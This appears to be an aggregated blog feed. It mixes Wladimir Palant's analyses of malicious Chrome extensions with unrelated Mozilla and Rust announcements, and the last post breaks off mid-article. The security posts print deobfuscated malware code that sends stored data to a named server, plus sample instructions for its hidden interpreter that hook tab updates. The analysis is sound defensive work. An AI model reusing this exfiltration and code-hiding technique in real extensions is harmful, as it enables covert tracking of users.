Wladimir PalantHow malicious extensions hide running arbitrary code

Two days ago I wrote about the malicious extensions I discovered in Chrome Web Store. At some point this article got noticed by Avast. Once their team confirmed my findings, Google finally reacted and started removing these extensions. Out of the 34 extensions I reported, only 8 extensions remain. These eight were all part of an update where I added 16 extensions to my list, an update that came too late for Avast to notice.

Note: Even for the removed extensions, it isn’t “mission accomplished” yet. Yes, the extensions can no longer be installed. However, the existing installations remain. From what I can tell, Google didn’t blocklist these extensions yet.

Avast ran their own search, and they found a bunch of extensions that I didn’t see. So how come they missed eight extensions? The reason seems to be: these are considerably different. They migrated to Manifest V3, so they had to find new ways of running arbitrary code that wouldn’t attract unnecessary attention.

Update (2023-06-03): These extensions have been removed from the Chrome Web Store as well.

Which extensions is this about?

The malicious extensions currently still in Chrome Web Store are:

Name Weekly active users Extension ID
Soundboost 6,925,522 chmfnmjfghjpdamlofhlonnnnokkpbao
Amazing Dark Mode 2,228,049 fbjfihoienmhbjflbobnmimfijpngkpa
Awesome Auto Refresh 2,222,284 djmpbcihmblfdlkcfncodakgopmpgpgh
Volume Frenzy 1,626,760 idgncaddojiejegdmkofblgplkgmeipk
Leap Video Downloader 1,454,917 bjlcpoknpgaoaollojjdnbdojdclidkh
Qspeed Video Speed Controller 732,250 pcjmcnhpobkjnhajhhleejfmpeoahclc
HyperVolume 592,479 hinhmojdkodmficpockledafoeodokmc
Light picture-in-picture 172,931 gcnceeflimggoamelclcbhcdggcmnglm

Is it even the same malware?

I found this latest variant of the malicious code thanks to Lukas Andersson who researched reputation manipulation in Chrome Web Store. He shared with me a list of extensions that manipulated reviews similarly to the extensions I already discovered. Some of these extensions in fact turned out malicious, with a bunch using malicious code that I didn’t see before.

But this isn’t evidence that all these extensions are in fact related. And the new variant even communicates with tryimv3srvsts[.]com instead of serasearchtop[.]com. So how can I be certain that it is the same malware?

The obfuscation approach gives it away however: lots of unnecessary conditional statements, useless variables and strings being pieced together. It’s exactly the same thing as I described for the PDF Toolbox extension already. Also, there is this familiar mangled timestamp meant to prevent config downloads in the first 24 hours after installation. It merely moved: localStorage is no longer usable with Manifest V3, so the timestamp is being stored in storage.local.

The code once against masquerades as part of a legitimate library. This time, it has been added to the parser module of the Datejs library.

The “config” downloads

The approach to downloading the instructions changed considerably however. I’ll use Soundboost extension as my example, given that it is by far the most popular. When downloading the “config” file, Soundboost might also upload data. With obfuscation removed, the code looks roughly like this:

async function getConfig()
{
  let config = (await chrome.storage.local.get("<key>")).<key>;
  let options;
  if (config)
  {
    options = {
      method: "POST",
      body: JSON.stringify(config)
    };
  }
  else
  {
    config = {};
    options = {
      method: "GET"
    };
  }
  let response = await fetch(
    "https://tryimv3srvsts.com/chmfnmjfghjpdamlofhlonnnnokkpbao",
    options
  );
  let json = await response.json();
  Object.assign(config, json);
  if (config.l)
    chrome.storage.local.set({<key>: config});
  return config.l;
}

So the extension will retrieve the config from storage.local, send it to the server, merge it with the response and write it back to storage.local. But what’s the point of sending a config to the server that has been previously received from it?

I can see only one answer: by the time the config is sent to the server, additional data will be added to it. So this is a data collection and exfiltration mechanism: the instructions in config.l, when executed by the extension, will collect data and store it in the storage.local entry. And next time the extension starts up this data will be sent to the server.

This impression is further reinforced by the fact that the extension will reload itself every 12 hours. This makes sure that accumulated data will always be sent out after this time period, even if the user never closes their browser.

Executing the instructions

Previously, Chrome extensions could always run arbitrary JavaScript code as content scripts. As this is a major source of security vulnerabilities, Manifest V3 disallowed that. Now running dynamic code is only possible by relaxing default Content Security Policy restrictions. But that would raise suspicions, so malicious extensions would like to avoid it of course.

With sufficient determination, such restrictions can always be worked around however. For example, the Honey extension chose to ship an entire JavaScript interpreter with it. This allowed it to download and run JavaScript code without it being subject to the browser’s security mechanisms. The company was apparently so successful extracting data in this way that PayPal bought it for $4 billion.

A JavaScript interpreter is lots of code however. There are indications that the malicious code in Soundboost is being obfuscated manually, something that doesn’t work with large code quantities. So the instruction processing in Soundboost is a much smaller interpreter, one that supports only 8 possible actions. This minimalistic approach is sufficient to do considerable damage.

The interpreter works on arrays representing expressions, with the first array element indicating the type of the expression and the rest of them being used as parameters. Typically, these parameters will themselves be recursively resolved as expressions. Non-array expressions are left unchanged.

I tried out a bunch of instructions just to see that this approach is sufficient to abuse just about any extension privileges. The following instructions will print a message to console:

[
  // Call console.log
  "@", [".", ["console"], "log"],
  // Verbatim call parameter
  "hi"
]

The following calls chrome.tabs.update() to redirect the current browser tab to another page:

[
  // Call chrome.tabs.update
  "@", [".", [".", ["chrome"], "tabs"], "update"],
  // Verbatim call parameter
  {url: "https://example.com/"}
]

The malicious code also likely wants to add a tabs.onUpdated listener. This turned out to be more complicated. Not because of the necessity of creating a callback, the interpreter has you covered with the "^" expressions there. However, function calls performed with this interpreter won’t pass in a this argument, and addListener method doesn’t like that.

There might be multiple way to work around this issue, but the one I found was calling via Reflect.apply and passing in a this argument explicitly. This also requires calling Array constructor to create an array:

[
  // Call Reflect.apply
  "@", [".", ["Reflect"], "apply"],
  // target parameter: chrome.tabs.onUpdated.addListener
  [".", [".", [".", ["chrome"], "tabs"], "onUpdated"], "addListener"],
  // thisArgument parameter: chrome.tabs.onUpdated
  [".", [".", ["chrome"], "tabs"], "onUpdated"],
  // argumentsList parameter
  [
    // Call Array constructor
    "@", ["Array"],
    // Array element parameter
    [
      // Create closure
      "^",
      [
        // Call console.log
        "@", [".", ["console"], "log"],
        // Pass in function arguments received by the closure
        ["#"]
      ]
    ]
  ]
]

These instructions successfully log any tab change reported to the onUpdated listener.

So this isn’t the most comfortable language to use, but with some tricks it can do pretty much anything. It also lacks flow control constructs other than try .. catch. Yet this is already sufficient to construct simple if blocks, triggering an exception to execute the else part. It should even be possible to emulate loops via recursive calls.

What is this being used for?

As with the other extensions, I haven’t actually seen the instructions that the extensions receive from their server. So I cannot know for certain what they do when activated. Reviews of older extensions report them redirecting Google searches to Bing, which is definitely something these newer extensions could do as well.

As mentioned above however, the newer extensions clearly transmit data to their server. What kind of data? All of them have access to all websites, so it would be logical if they collected full browsing profiles. The older extensions likely did as well, but this isn’t something that users would easily notice.

Quite remarkably, all the extensions also have the scripting permission which is unlikely to be a coincidence. This permission allows the use of the scripting.executeScript API, meaning running JavaScript code in the context of any website loaded in the browser. The catch however is: this API won’t run arbitrary code, only code that is already part of the extension.

I’m not entirely certain what trick the extensions pull to work around this limitation, but they’ve certainly thought of something. Most likely, their trick involves loading background.js into pages – while this file is supposed to run as the extension’s background worker, it’s part of the extension and the scripting.executeScript API will allow using it. One indirect confirmation is the obfuscated code in background.js registering a listener for the message event, despite the fact that nothing should be able to send such messages as long as the script runs as background worker.

The Mozilla BlogAdvancing the future of the internet with the ‘Photoshop of software’

A head shot of Jeff Lindsay atop an illustration of cubes.<figcaption class="wp-element-caption">Jeff Lindsay is working to build the Photoshop of software at his company Progrium.</figcaption>

More than ever, we need a movement to ensure the internet remains a force for good. The Mozilla Internet Ecosystem (MIECO) program fuels this movement by supporting people who are looking to advance a more human-centered internet. With MIECO, Mozilla is looking to foster a new era of internet innovation that moves away from “fast and breaking things” and into a more purposeful, collaborative effort that includes voices and perspectives from many different companies and organizations.

This week we’re highlighting Jeff Lindsay, a self-proclaimed “rogue software engineer” who’s working to build the Photoshop of software at his company Progrium.


Jeff Lindsay has been shaking things up in Silicon Valley for the last two decades. 

In the 2000s, he helped start SuperHappyDevHouse, a series of large parties for laptop-toting hackers to “work on whatever they feel like working on,” as his co-founder David Weekly once described it.

Jeff went on to develop a reputation for his ability to build things quickly while freelancing across the Bay Area. While working at a NASA research center in Mountain View, he was involved in developing OpenStack, an open source version of Amazon’s cloud service. Jeff also helped design and prototype the software Docker, which has become a billion-dollar company that creates productivity tools. He coined and pioneered webhooks, a standard way to create app integrations and plugins. Over the years, developers widely adopted his open source tools and libraries.

Now, in collaboration with MIECO, Jeff is working on Tractor System, a tool that lets users build software in a way that’s similar to creating and editing in Photoshop. His company, Progrium, is on a mission to empower the next generation of makers by providing tools and resources to reduce the complexity of computing through generative building blocks.

Jeff wants to make it easier for people to make software for themselves so that they’re less dependent on vendors who make software for companies and their needs. As the landscape of software development continues to evolve at a rapid pace, Jeff’s work aims to bridge the gap between using software, and creating it.

Tractor System is about building software that works for people, not corporations, Jeff said. 

“Photoshop gives you the tools to do image manipulation yourself,” he explained. “So if I can build something that gives you enough tools to assemble and interact with software systems in a very general sense, then it opens up a whole lot more possibilities.”

He compared using Tractor System to having pre-assembled Lego kits. “You just take these pieces, and you put them together in new and novel ways,” he said. “Then you can take [the structure] apart and remix it with another kit.”

Jeff said the idea was inspired by game development, where designers can configure and make custom components using the game engine Unity. In a sense, Tractor System takes him back to how he got started as a programmer in the first place: finding a Commodore 64 at a flea market and then learning how to make games from programming books at his local library.

“I love anything that gives programmers more superpowers,” Jeff said. “And I love anything that then makes programming more accessible, because then regular people get those superpowers.”

The post Advancing the future of the internet with the ‘Photoshop of software’ appeared first on The Mozilla Blog.

Firefox NightlyFirefox Translations and Other Innovations – These Weeks in Firefox: Issue 139

Highlights

  • New in Nightly – Firefox Translations! Firefox can now often detect if you’re viewing a page written in a language not matching the one matching your locale, and for some languages offer to translate the page for you.
    • A panel opened from the Firefox Desktop URL bar asking if the user wants to translate the current page. The panel offers to translate the page from German to English.

      Ja, bitte!

    • This happens entirely client-side. This means the URL of the page, nor any of the page data ever leaves your computer. The trade-off is the need to download “translation engines”, which can be done at translation-time, or you can manage them yourself in about:preferences:
      • A section of the Firefox Preferences interface is shown with the title "Translations". The section offers to download languages for offline translation. A button is presented to download all languages, and then a series of individual languages are offered: Bulgarian, Catalan, Czech and Dutch are listed before the list goes outside of the screenshotted region.

        Qui è dove è possibile gestire i motori di lingua scaricati.

    • This is the direct successor to the venerable Firefox Translations add-on and builds on the research done with that project.
    • Bonus capability: visit about:translations to translate your own text as well
    • This is ready for Nightly testing. Found a bug? You can file a new one blocking this metabug.
  • New support for Picture-in-Picture captions – thanks to janvi for the patches:
  • Hubert enabled the Firefox Devtools debugger feature to ignore specific lines while debugging, as opposed to ignoring just files (bug)
    • The Debugger in the Firefox Devtools is shown with a context menu opened over a particular line in some JavaScript source code. The bottom entry in the menu is highlighted, and reads "Unignore line".

      Ignoring and unignoring lines makes it easier to step through the code you actually care about debugging!

  • Nicolas enabled the CSS compatibility tooltip feature on Nightly! (bug)
    • The Rules pane of the Firefox DevTools Inspector panel is shown, with several rules struck out, including "-webkit-text-size-adjust: 100%;". A lightbulb icon appears to the right of that rule with a tooltip explaining that "-webkit-text-size-adjust is an experimental property. It is not supported in the following browsers:", followed by a list of browser icons and version numbers.

      This should make it easier for web developers to ensure that their styles will work the way they expect them to for all browsers.

 

Friends of the Firefox team

Resolved bugs (excluding employees)

Volunteers that fixed more than one bug
  • Gregory Pappas [:gregp]
  • Janvi Bajoria [:janvi01]
  • Magnus Melin [:mkmelin]
New contributors (🌟 = first patch)

Project Updates

Add-ons / Web Extensions

Addon Manager & about:addons
  • As part of the Colorways Migration: in Firefox >= 115, we are allowing Colorways builtin themes to be auto-updated to the corresponding non-builtin Colorway themes hosted on addons.mozilla.org for users not yet migrated because of the extensions.update.autoUpdateDefault pref being set to false (Bug 1830337)
WebExtensions Framework
  • Thanks to Eemeli, the localized strings related to the extension permissions have been migrated to Fluent (Bug 1793557, Bug 1632091)
  • Thanks to :ochameau and :peterv for their work to introduce the nsIConsoleService.callFunctionAndLogException helper in Bug 1810582
    • This new helper is going to be used in a separate followup, Bug 1810582, to make sure we include a full error stack trace when logging the exceptions raised from extension callbacks executed in response to the WebExtensions API events being emitted.
  • Thanks to Kris’ work in Bug 1769763, string labels (anonymized and non-anonymized) can now be associated with the StructureCloneHolder instances (which is going to be very helpful to determine what the StructureCloneHolder instances belongs to in about:memory reports)
  • Thanks to Shane Hughes for reporting and fixing a slightly annoying glitch in the extensions panel (Bug 1810509)
  • Thanks to Gregory Pappas for contributing a nice cleanup of the downloads API internals (Bug 1834338)
WebExtension APIs
  • As part of the browser_style deprecation (started in Firefox 114), in Firefox 115 options_ui.browser_style and sidebar_action.browser_style will default to false for all Manifest Version 3 extensions (Bug 1830710).
  • Thanks to Gregory Pappas for contributing the changes needed to introduce a new browser.commands.onChanged WebExtensions API event, which will allow the extensions to be notified when a users changes a shortcut associated to the extensions commands in about:addons (Bug 1801531)

Developer Tools

DevTools
  • Contributors
    • Martín González Gómez, extracted the highlighter code used to render the viewport size to a dedicated module. This will make it possible to automatically display this information on resize in a follow up (bug)
    • Sebo added support for custom formatters in the debugger tooltip (bug)
  • Other teams
    • Arai fixed several issues around eager evaluation in the console (bug and bug)
  • Hubert added support for hiding sources based on the source maps x_google_ignoreList  field (bug)
    • The Firefox Debugger panel is shown with the tool's settings panel opened over top. The last item in that settings panel is highlighted and reads "Ignore Known Third-party Scripts".

      More tools to help you focus on the scripts that you actually care to debug!

    • A script titled "original-3.js" from the site "sourcemap-ignore-list.glitch.me" is shown. The source code is displayed, but the syntax highlighting is disabled, as the source is all being ignored for debugging.
  • Hubert added an option to hide the ignored (blackboxed) sources Bug 1824703 – Add an option to hide / show blackboxed sources
    • The Firefox Debugger panel is shown with the tool's settings panel opened over top. The second-last item in that settings panel is checked and highlighted and reads "Hide Ignored Sources"

      This can also help reduce visual clutter in the debugger.

    • The source list in the Firefox Debugger is shown, listing various scripts loaded on the page. At the bottom of the source list is a message that says: "Ignored sources are hidden", followed by a button to "Show all sources".
  • Hubert also fixed a bug where adding a breakpoint would automatically unignore a source (bug)
  • Nicolas updated the links in our compatibility panel to be more explicit and added an MDN icon for links to MDN (bug)
    • The Compatibility pane from the Firefox Inspector Panel is shown. A list of rules is shown, including "scrollbar-color" and "font-smooth". Each rule is a link, followed by an icon representing MDN.
  • Nicolas also fixed more performance issues with the CSS compatibility tooltip (bug)
  • Alex fixed a bug where the icons in the debugger would randomly flicker when selecting a source (bug)
  • Alex addressed a performance regression on the Debugger (bug)
WebDriver BiDi
  • Contributors
    • Victoria Ajala fixed a bug to use the Timer module instead of window.setTimeout in various Remote Protocol modules (bug)
  • Other teams
    • Dan Robertson fixed the actions code to properly end wheel transactions, which allows us to stop disabling dom.event.wheel-event-groups.enabled for our users (bug)
  • Henrik removed the experimental flag from the input.performActions and input.releaseActions commands, which means they are now available to all WebDriver BiDi users (bug)
  • Julian fixed a bug where we would raise the incorrect exception when using a non-element Node as the origin of an action (bug)

Fluent

  • Eemeli continues to burn down our .properties strings. We’re down to 4200 .properties strings (we had ~4400 at the start of this month)
    • A graph from arewefluentyet.com is shown, showing the proportion of strings in the mozilla-central repository that are of the Fluent type, and of the .properties type. The x-axis is the date, and the y-axis is the count of strings by type. May 28th is the date selected in the graph, and a tooltip appears showing 6990 Fluent strings and 4200 .properties strings in the code on that date.

ESMification status

  • ESMified status:
    • browser: 71%
    • toolkit: 88%
    • Total:  85.3% (up from 81.6%)
  • #esmification on Matrix
  • Migration Document (with a walkthrough!)

Lint, Docs and Workflow

Migration Improvements

  • hjones and mconley have been working on a mechanism to help people migrate off of old devices to new devices
    • There’s a Help menu item, starting in Firefox 114, “Switching to a new device”, which sends the user to this SUMO page.
    • We’ve built a “setup assistant” to walk the user through creating a Firefox Account and setting up sync. Finally, the user is presented with a URL to download a version of Firefox that, after install, is configured to first present the user with a Firefox Account login prompt during onboarding (for Firefox 114+).
    • We hope this will help people easily and securely move their data from old computers to newer ones.
  • Thanks to tgiles and mstriemer, we’ve got patches up to add support for importing history from Safari and importing bookmarks from HTML files (and JSON files)!
    • Special thanks to Evan Liang from CalState LA for getting us started on the Safari patch
  • mconley landed a patch to get payment method import working for Chrome-based browsers
    • Special thanks to Zach Harris from CalState LA for getting us started on that patch
  • mconley fixed a performance issue with importing form history entries from Chrome-based browsers

Picture-in-Picture

Search and Navigation

  • Daisuke has been working on an experiment to test Addon suggestions in the urlbar – see bugs 1833750, 1833760, 1833966
  • Drew has switched the result menu in the urlbar to use native context menu on mac – see bug 1831760
  • Mark updated the Gule sider search engine url – see bug 1834066
  • James and Stephanie have worked on various new recordings and bug fixes to search telemetry – see bugs 1816733, 1816738, 1823683, 1833245
  • Daisuke fixed pasted strings being overwritten – see bug 1834218

The Mozilla BlogMozilla Ventures Invests in Fiddler, Fueling Better AI Trust

The investment will help Fiddler scale its AI Observability Platform 

(PALO ALTO, CA | JUNE 1, 2023) – Today, Mozilla Ventures is announcing an investment in Fiddler, the Silicon Valley-based company that helps enterprises build trust into AI with monitoring, explainability, analytics, fairness, and safety. 

The Fiddler AI Observability Platform gives companies more visibility into their predictive and generative AI models. Fiddler’s platform helps stakeholders understand why predictions are made and what improvements are necessary for better outcomes — ultimately creating more trustworthy AI systems.

Fiddler brings increased transparency and actionable insights to the AI field at a vital moment. Generative AI models and applications are quickly being folded into consumer products and impacting billions of people — but sometimes these systems are biased and opaque, even to the engineers who build them.

Mozilla Ventures is a first-of-its-kind impact venture fund to invest in startups that push the internet — and the tech industry — in a better direction. The fund’s mission is largely modeled on Mozilla’s “Creating Trustworthy AI” whitepaper. 

Mozilla Ventures isn’t publicizing its investment amount at this time. Fiddler has previously received investment from Insight Partners, Lightspeed Venture Partners, Lux Capital, Alteryx Ventures, Haystack Ventures, Bloomberg Beta, and The Alexa Fund, among other investors.

This funding will help Fiddler bring its Responsible AI by Design approach to influential customers, a list which already includes some noteworthy organizations. Core to Fiddler’s Responsible AI by Design approach is the question, How might an AI model adversely affect humans?

Fiddler defines responsible AI as a series of best practices to ensure that LLM and MLOps-based systems deliver on their intent while mitigating unintended or harmful consequences. The platform enables responsible AI through monitoring and out-of-the-box AI explainability and relies on the principles of fairness, transparency, privacy, reliability, and accountability.

Fiddler also participated in Mozilla’s Responsible AI Challenge event on May 31, which convenes some of the brightest AI thinkers, technologists, ethicists and business leaders.

Says Krishna Gade, Founder and CEO of Fiddler: “We started Fiddler because there’s a need not just for more AI Observability in the industry, but also a framework that prioritizes societal good. Mozilla’s investment helps fuel our mission to make trustworthy, transparent, and understandable AI the status quo.”

Says Mohamed Nanabhay, Managing Partner of Mozilla Ventures: “Fiddler and Mozilla Ventures have a shared vision of AI — one that prioritizes fairness and explainability. In Fiddler’s role supporting a wide-range of AI companies, they can have an outsized influence on the ecosystem.”

Fiddler will join a cohort of other mission driven startups that Mozilla Ventures has invested in, including SAIL, heylogin, Lelapa AI, Themis AI, Block Party, and Rodeo. Mozilla Ventures launched in 2022 with an initial $35 million in funding.

Press contact: Kevin Zawacki | kevin@mozillafoundation.org 

###

The post <strong>Mozilla Ventures Invests in Fiddler, Fueling Better AI Trust </strong> appeared first on The Mozilla Blog.

The Mozilla BlogAnnouncing Mozilla’s ‘Responsible AI Challenge’ top prize winners

When we relaunched the Mozilla Builders program last March, we unveiled our Responsible AI Challenge — a one-day, in-person event designed to inspire and encourage a community of builders working on trustworthy AI products and solutions — essentially a call to builders and technologists all over the world to create trustworthy AI solutions.

We are delighted to announce the prize winners of our Responsible AI Challenge, who demonstrated their ingenuity, innovation, and proficiency in developing human-centered and trustworthy AI applications and solutions.

A community of Builders

After weeks of reviewing hundreds of competitive consumer technology and generative AI projects, this challenge brought together builders and entrepreneurs from around the world, each vying to build better products and more responsible companies, despite the fact that it’s often the path of most resistance. After careful deliberation by our panel of judges – select individuals including AI academics, developers and entrepreneurs – we are proud to present the top prize winners amongst a community of Builders working on Trustworthy AI products and solutions.

<figcaption class="wp-element-caption">Projects pictured from left to right: Nolano, Sanative AI and Kwanele Chat Bot.</figcaption>

Top Prize Winner [$50,000]: Sanative AI provides anti-AI watermarks to protect images and artwork from being used as training data for diffusion models.

2nd Prize Winner [$30,000]: Kwanele Chat Bot aims to empower women in communities plagued by violence by enabling them to access help fast and ensure the collection of admissible evidence.

3rd Prize Winner [$20,000]: Nolano is a trained language model that uses natural language processing to run on laptops and smartphones.

Build-by-Build: Standing on the shoulders of giants

<figcaption class="wp-element-caption">Imo Udom introduces the keynote speakers to the stage.</figcaption>

“We’re existing in a unique and consequential time that is drawing huge emphasis on AI and catalyzing a movement towards more responsible development (something Mozilla is best known for) and it’s critical we act accordingly and influence where we can.”

Imo Udom, Senior Vice President of Innovation Ecosystems at Mozilla

The Responsible AI Challenge featured builders at various stages of their entrepreneurial and Trustworthy AI journeys: some were very early on and had never built a product before, others were seasoned entrepreneurs who were unfamiliar with Trustworthy AI, and still others were seasoned entrepreneurs who are already developing AI responsibly.

“Mozilla’s goal was for the judging process to be motivational for all candidates, inspiring them to continue developing responsible AI solutions in the future, even if they did not win,” says Britney Crooks, Director, Innovation and Product Strategy at Mozilla. “We asked that the judges raise key issues and considerations, while focusing on practical suggestions or alternative approaches for the applicants to address these issues.”

<figcaption class="wp-element-caption">Mozillians take part in a reception post-ceremony.</figcaption>

In addition to cash prizes, the top three Responsible AI Challenge winners will receive ongoing access to mentorship from leaders in the industry and to Mozilla’s resources and communities, as they continue to develop, refine and deliver their responsible AI projects.

We will be publishing more in-depth features on the upcoming projects on the Mozilla Hacks blog.

The post Announcing Mozilla’s ‘Responsible AI Challenge’ top prize winners appeared first on The Mozilla Blog.

The Rust Programming Language BlogAnnouncing Rust 1.70.0

The Rust team is happy to announce a new version of Rust, 1.70.0. Rust is a programming language empowering everyone to build reliable and efficient software.

If you have a previous version of Rust installed via rustup, you can get 1.70.0 with:

rustup update stable

If you don't have it already, you can get rustup from the appropriate page on our website, and check out the detailed release notes for 1.70.0 on GitHub.

If you'd like to help us out by testing future releases, you might consider updating locally to use the beta channel (rustup default beta) or the nightly channel (rustup default nightly). Please report any bugs you might come across!

What's in 1.70.0 stable

Sparse by default for crates.io

Cargo's "sparse" protocol is now enabled by default for reading the index from crates.io. This feature was previously stabilized with Rust 1.68.0, but still required configuration to use that with crates.io. The announced plan was to make that the default in 1.70.0, and here it is!

You should see substantially improved performance when fetching information from the crates.io index. Users behind a restrictive firewall will need to ensure that access to https://index.crates.io is available. If for some reason you need to stay with the previous default of using the git index hosted by GitHub, the registries.crates-io.protocol config setting can be used to change the default.

One side-effect to note about changing the access method is that this also changes the path to the crate cache, so dependencies will be downloaded anew. Once you have fully committed to using the sparse protocol, you may want to clear out the old $CARGO_HOME/registry/*/github.com-* paths.

OnceCell and OnceLock

Two new types have been stabilized for one-time initialization of shared data, OnceCell and its thread-safe counterpart OnceLock. These can be used anywhere that immediate construction is not wanted, and perhaps not even possible like non-const data in global variables.

use std::sync::OnceLock;

static WINNER: OnceLock<&str> = OnceLock::new();

fn main() {
    let winner = std::thread::scope(|s| {
        s.spawn(|| WINNER.set("thread"));

        std::thread::yield_now(); // give them a chance...

        WINNER.get_or_init(|| "main")
    });

    println!("{winner} wins!");
}

Crates such as lazy_static and once_cell have filled this need in the past, but now these building blocks are part of the standard library, ported from once_cell's unsync and sync modules. There are still more methods that may be stabilized in the future, as well as companion LazyCell and LazyLock types that store their initializing function, but this first step in stabilization should already cover many use cases.

IsTerminal

This newly-stabilized trait has a single method, is_terminal, to determine if a given file descriptor or handle represents a terminal or TTY. This is another case of standardizing functionality that existed in external crates, like atty and is-terminal, using the C library isatty function on Unix targets and similar functionality elsewhere. A common use case is for programs to distinguish between running in scripts or interactive modes, like presenting colors or even a full TUI when interactive.

use std::io::{stdout, IsTerminal};

fn main() {
    let use_color = stdout().is_terminal();
    // if so, add color codes to program output...
}

Named levels of debug information

The -Cdebuginfo compiler option has previously only supported numbers 0..=2 for increasing amounts of debugging information, where Cargo defaults to 2 in dev and test profiles and 0 in release and bench profiles. These debug levels can now be set by name: "none" (0), "limited" (1), and "full" (2), as well as two new levels, "line-directives-only" and "line-tables-only".

The Cargo and rustc documentation both called level 1 "line tables only" before, but it was more than that with information about all functions, just not types and variables. That level is now called "limited", and the new "line-tables-only" level is further reduced to the minimum needed for backtraces with filenames and line numbers. This may eventually become the level used for -Cdebuginfo=1. The other line-directives-only level is intended for NVPTX profiling, and is otherwise not recommended.

Note that these named options are not yet available to be used via Cargo.toml. Support for that will be available in the next release 1.71.

Enforced stability in the test CLI

When #[test] functions are compiled, the executable gets a command-line interface from the test crate. This CLI has a number of options, including some that are not yet stabilized and require specifying -Zunstable-options as well, like many other commands in the Rust toolchain. However, while that's only intended to be allowed in nightly builds, that restriction wasn't active in test -- until now. Starting with 1.70.0, stable and beta builds of Rust will no longer allow unstable test options, making them truly nightly-only as documented.

There are known cases where unstable options may have been used without direct user knowledge, especially --format json used in IntelliJ Rust and other IDE plugins. Those projects are already adjusting to this change, and the status of JSON output can be followed in its tracking issue.

Stabilized APIs

Other changes

Check out everything that changed in Rust, Cargo, and Clippy.

Contributors to 1.70.0

Many people came together to create Rust 1.70.0. We couldn't have done it without all of you. Thanks!

Wladimir PalantMore malicious extensions in Chrome Web Store

Two weeks ago I wrote about the PDF Toolbox extension containing obfuscated malicious code. Despite reporting the issue to Google via two different channels, the extension remains online. It even gained a considerable number of users after I published my article.

A reader tipped me off however that the Zoom Plus extension also makes a request to serasearchtop[.]com. I checked it out and found two other versions of the same malicious code. And I found more extensions in Chrome Web Store which are using it.

So now we are at 18 malicious extensions with a combined user count of 55 million. The most popular of these extensions are Autoskip for Youtube, Crystal Ad block and Brisk VPN: nine, six and five million users respectively.

Update (2023-06-01): With an increased sample I was able to find some more extensions. Also, Lukas Andersson did some research into manipulated extension ratings in Chrome Web Store and pointed out that other extensions exhibited similar patterns in their review. With his help I was able to identify yet another variant of this malicious code and a bunch more malicious extensions. So now we are at 34 malicious extensions and 87 million users.

Update (2023-06-01): Good news: Google started removing these extensions. By the time I published my previous update, a bunch of the extensions mentioned there were already gone. Right now, only nine extensions from this list remain in Chrome Web Store, and these will hopefully also be dealt with soon.

Update (2023-06-02): Google removed one more extension, so only eight extensions remain now. These eight extensions are considerably different from the rest, so I published a follow-up blog post discussing the technical aspects here.

The extensions

So far I could identify the following 34 malicious extensions. Most of them are listed as “Featured” in Chrome Web Store. User counts reflect the state for 2023-05-30.

Name Weekly active users Extension ID
Autoskip for Youtube 9,008,298 lgjdgmdbfhobkdbcjnpnlmhnplnidkkp
Soundboost 6,925,522 chmfnmjfghjpdamlofhlonnnnokkpbao
Crystal Ad block 6,869,278 lklmhefoneonjalpjcnhaidnodopinib
Brisk VPN 5,595,420 ciifcakemmcbbdpmljdohdmbodagmela
Clipboard Helper 3,499,233 meljmedplehjlnnaempfdoecookjenph
Maxi Refresher 3,483,639 lipmdblppejomolopniipdjlpfjcojob
Quick Translation 2,797,773 lmcboojgmmaafdmgacncdpjnpnnhpmei
Easyview Reader view 2,786,137 icnekagcncdgpdnpoecofjinkplbnocm
PDF toolbox 2,782,790 bahogceckgcanpcoabcdgmoidngedmfo
Epsilon Ad blocker 2,571,050 bkpdalonclochcahhipekbnedhklcdnp
Craft Cursors 2,437,224 magnkhldhhgdlhikeighmhlhonpmlolk
Alfablocker ad blocker 2,430,636 edadmcnnkkkgmofibeehgaffppadbnbi
Zoom Plus 2,370,645 ajneghihjbebmnljfhlpdmjjpifeaokc
Base Image Downloader 2,366,136 nadenkhojomjfdcppbhhncbfakfjiabp
Clickish fun cursors 2,353,436 pbdpfhmbdldfoioggnphkiocpidecmbp
Cursor-A custom cursor 2,237,147 hdgdghnfcappcodemanhafioghjhlbpb
Amazing Dark Mode 2,228,049 fbjfihoienmhbjflbobnmimfijpngkpa
Maximum Color Changer for Youtube 2,226,293 kjeffohcijbnlkgoaibmdcfconakaajm
Awesome Auto Refresh 2,222,284 djmpbcihmblfdlkcfncodakgopmpgpgh
Venus Adblock 1,973,783 obeokabcpoilgegepbhlcleanmpgkhcp
Adblock Dragon 1,967,202 mcmdolplhpeopapnlpbjceoofpgmkahc
Readl Reader mode 1,852,707 dppnhoaonckcimpejpjodcdoenfjleme
Volume Frenzy 1,626,760 idgncaddojiejegdmkofblgplkgmeipk
Image download center 1,493,741 deebfeldnfhemlnidojiiidadkgnglpi
Font Customizer 1,471,726 gfbgiekofllpkpaoadjhbbfnljbcimoh
Easy Undo Closed Tabs 1,460,691 pbebadpeajadcmaoofljnnfgofehnpeo
Screence screen recorder 1,459,488 flmihfcdcgigpfcfjpdcniidbfnffdcf
OneCleaner 1,457,548 pinnfpbpjancnbidnnhpemakncopaega
Repeat button 1,456,013 iicpikopjmmincpjkckdngpkmlcchold
Leap Video Downloader 1,454,917 bjlcpoknpgaoaollojjdnbdojdclidkh
Tap Image Downloader 1,451,822 okclicinnbnfkgchommiamjnkjcibfid
Qspeed Video Speed Controller 732,250 pcjmcnhpobkjnhajhhleejfmpeoahclc
HyperVolume 592,479 hinhmojdkodmficpockledafoeodokmc
Light picture-in-picture 172,931 gcnceeflimggoamelclcbhcdggcmnglm

Note that this list is unlikely to be complete. It’s based on a sample of roughly 1,600 extensions that I have locally, not all the Chrome Web Store contents.

The malicious code

There is a detailed discussion of the malicious code in my previous article. I couldn’t find any other extension using the same code as PDF Toolbox, but the two variants I discovered now are very similar. There are minor differences:

  • First variant masquerades as Mozilla’s WebExtension browser API Polyfill. The “config” download address is https://serasearchtop.com/cfg/<Extension_ID>/polyfill.json, and the mangled timestamp preventing downloads within the first 24 hours is localStorage.polyfill.
  • The second variant masquerades as Day.js library. It downloads data from https://serasearchtop.com/cfg/<Extension_ID>/locale.json and stores the mangled timestamp in localStorage.locale.

Both variants keep the code of the original module, the malicious code has been added on top. The WebExtension Polyfill variant appears to be older: the extensions using it usually had their latest release end of 2021 or early in 2022. The extensions using the Day.js variant are newer, and the code has been obfuscated more thoroughly here.

The extension logic remains exactly the same however. Its purpose is making two very specific function calls, from the look of it: chrome.tabs.onUpdated.addListener and chrome.tabs.executeScript. So these extensions are meant to inject some arbitrary JavaScript code into every website you visit.

What does it actually do?

